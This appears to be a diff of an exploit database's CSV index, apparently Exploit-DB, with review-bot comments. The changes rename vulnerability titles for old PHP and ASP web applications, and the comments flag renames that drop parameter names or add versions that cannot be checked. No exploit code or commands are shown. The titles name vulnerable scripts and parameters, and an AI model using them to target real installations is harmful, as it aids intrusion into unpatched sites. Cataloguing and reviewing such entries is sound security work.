 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0
 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0
-3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0
+3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,php,webapps,0
 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) SQL Injection",2007-03-04,ajann,php,webapps,0
 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0
 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection",2007-03-05,ajann,php,webapps,0
@@ -17510,7 +17524,7 @@ id,file,description,date,author,platform,type,port
 3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
 3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0
-3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - (debug_show.php) SQL Injection",2007-05-04,rgod,php,webapps,0
+3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,php,webapps,0
 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0
 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0
 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
@@ -17835,7 +17849,7 @@ id,file,description,date,author,platform,type,port
 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0
 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0
 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
-4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0
+4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' Parameter SQL Injection",2007-09-19,str0ke,php,webapps,0
 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0
 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0
 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0
@@ -17995,7 +18009,7 @@ id,file,description,date,author,platform,type,port
 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0
 4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0
-4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
+4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0
 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0
 4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0
@@ -18648,39 +18662,39 @@ id,file,description,date,author,platform,type,port
 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0
 5550,platforms/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0
 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0
-5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps,0
-5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
-5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0
-5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0
+5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection",2008-05-06,InjEctOr5,php,webapps,0
+5553,platforms/asp/webapps/5553.txt,"FipsCMS 2.1 - 'print.asp' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
+5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - 'cat' Parameter SQL Injection",2008-05-07,cOndemned,php,webapps,0
+5555,platforms/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection",2008-05-07,InjEctOr5,php,webapps,0
 5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0
-5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0
+5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0
 5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0
-5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0
-5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - (msg_image) SQL Injection",2008-05-08,The:Paradox,php,webapps,0
+5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' Parameter SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0
+5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection",2008-05-08,The:Paradox,php,webapps,0
 5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,asp,webapps,0
-5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - (tid) SQL Injection",2008-05-08,Saime,php,webapps,0
+5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection",2008-05-08,Saime,php,webapps,0
 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
-5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
-5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0
+5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
+5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0
 5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0
-5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection",2008-05-09,JosS,php,webapps,0
+5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' Parameter SQL Injection",2008-05-09,JosS,php,webapps,0
 5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0
-5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0
+5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,php,webapps,0
 5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps,0
-5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0
+5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection",2008-05-09,Mr.SQL,php,webapps,0
 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps,0
 5582,platforms/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps,0
-5583,platforms/php/webapps/5583.php,"Joomla! Component com_datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0
+5583,platforms/php/webapps/5583.php,"Joomla! Component Datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0
 5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion",2008-05-11,CraCkEr,php,webapps,0
 5587,platforms/php/webapps/5587.pl,"Joomla! Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps,0
 5588,platforms/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injections Vulnerabilities",2008-05-11,Lidloses_Auge,php,webapps,0
-5589,platforms/php/webapps/5589.php,"Vortex CMS - 'index.php pageid' Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0
-5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
-5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
+5589,platforms/php/webapps/5589.php,"Vortex CMS - 'pageid' Parameter Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0
+5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - 'featured_article.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
+5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
 5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
-5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0
+5595,platforms/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0
 5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
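Review bot: The rewritten 5553 row drops the vulnerable parameter ('lg' from 'print.asp lg') while every other renamed row in this hunk keeps it in the new 'X' Parameter form, and it also gains a version ("2.1") that the old description did not carry; `5553,platforms/asp/webapps/5553.txt,"FipsCMS 2.1 - 'lg' Parameter SQL Injection",...` would match the convention applied to 5552, 5554 and 5555. The same lossy pattern recurs in later hunks: 7152 keeps only 'viewalbums.php' and loses artistId, 8664 loses 'Username', 9132 loses the "(double ext)" mechanism hint, and 14354 loses the "Persistent" qualifier while gaining a version "3.0". The exploit file headers are not part of this diff, so the added version numbers cannot be checked from here; they should be confirmed against the referenced files before the index is updated.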
@@ -18748,7 +18762,7 @@ id,file,description,date,author,platform,type,port
 5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps,0
 5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0
 5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0
-5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - (install_mod.php) Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
+5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
 5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) SQL Injection",2008-05-24,His0k4,php,webapps,0
 5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0
 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0
@@ -18912,8 +18926,8 @@ id,file,description,date,author,platform,type,port
 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0
 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) SQL Injection",2008-06-19,anonymous,php,webapps,0
 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0
-5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0
-5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0
+5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0
+5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0
 5869,platforms/php/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
 5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
@@ -19135,7 +19149,7 @@ id,file,description,date,author,platform,type,port
 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0
 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
 6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0
-6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - (r) SQL Injection",2008-07-26,U238,asp,webapps,0
+6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
 6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0
 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0
@@ -19425,7 +19439,7 @@ id,file,description,date,author,platform,type,port
 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0
 6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0
 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0
-6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection",2008-09-24,GoLd_M,php,webapps,0
+6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection",2008-09-24,GoLd_M,php,webapps,0
 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0
 6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0
 6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0
@@ -19434,7 +19448,7 @@ id,file,description,date,author,platform,type,port
 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0
 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0
 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0
-6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
+6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0
 6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0
 6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - (task) Local File Inclusion",2008-09-25,dun,php,webapps,0
@@ -19599,7 +19613,7 @@ id,file,description,date,author,platform,type,port
 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0
 6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0
 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0
-6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
+6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0
 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0
 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
@@ -19709,12 +19723,11 @@ id,file,description,date,author,platform,type,port
 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'Directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0
 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0
 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0
-6927,platforms/php/webapps/6927.txt,"AJ Article - 'featured_article.php mode' SQL Injection",2008-11-01,Mr.SQL,php,webapps,0
 6928,platforms/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0
 6929,platforms/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0
 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0
 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - 'details.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0
-6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (Authentication Bypass) SQL Injection",2008-11-01,Hakxer,php,webapps,0
+6932,platforms/php/webapps/6932.txt,"AJ Article 1.0 - Authentication Bypass",2008-11-01,Hakxer,php,webapps,0
 6933,platforms/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change Exploit",2008-11-01,StAkeR,php,webapps,0
 6934,platforms/php/webapps/6934.txt,"Shahrood - 'ndetail.php id' Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0
 6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0
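Review bot: Row 6927 (platforms/php/webapps/6927.txt) is removed from the index, but this diff touches only files.csv, so it is not visible here whether the exploit file itself was deleted; if the file stays in the tree, the index and the tree diverge and anything that enumerates entries through files.csv silently stops listing it. If the row was dropped as a duplicate of the AJ Article 'featured_article.php' entry 5590 in an earlier hunk, that reason belongs in the commit message. Separately, the 6932 rewrite "AJ Article 1.0 - Authentication Bypass" no longer says the bypass is via SQL injection, which the old "(Authentication Bypass) SQL Injection" title did, and the added version "1.0" cannot be verified from this diff; `"AJ Article 1.0 - Authentication Bypass / SQL Injection"` would keep both facts.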
@@ -19835,7 +19848,7 @@ id,file,description,date,author,platform,type,port
 7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
 7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
-7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0
+7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0
@@ -19850,7 +19863,7 @@ id,file,description,date,author,platform,type,port
 7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0
 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0
 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0
-7081,platforms/php/webapps/7081.txt,"AJ ARTICLE - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
+7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
 7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
@@ -19901,7 +19914,7 @@ id,file,description,date,author,platform,type,port
 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
-7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0
+7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
@@ -20415,7 +20428,7 @@ id,file,description,date,author,platform,type,port
 7833,platforms/php/webapps/7833.php,"Joomla! Component com_waticketsystem - Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0
 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection",2009-01-19,"Danny Moules",php,webapps,0
 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0
-7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,php,webapps,0
+7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection",2009-01-20,snakespc,php,webapps,0
 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,php,webapps,0
 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion",2009-01-20,Stack,php,webapps,0
 7840,platforms/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0
@@ -20868,7 +20881,7 @@ id,file,description,date,author,platform,type,port
 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0
 8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0
 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0
-8664,platforms/php/webapps/8664.pl,"BigACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
+8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0
 8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0
@@ -20984,7 +20997,7 @@ id,file,description,date,author,platform,type,port
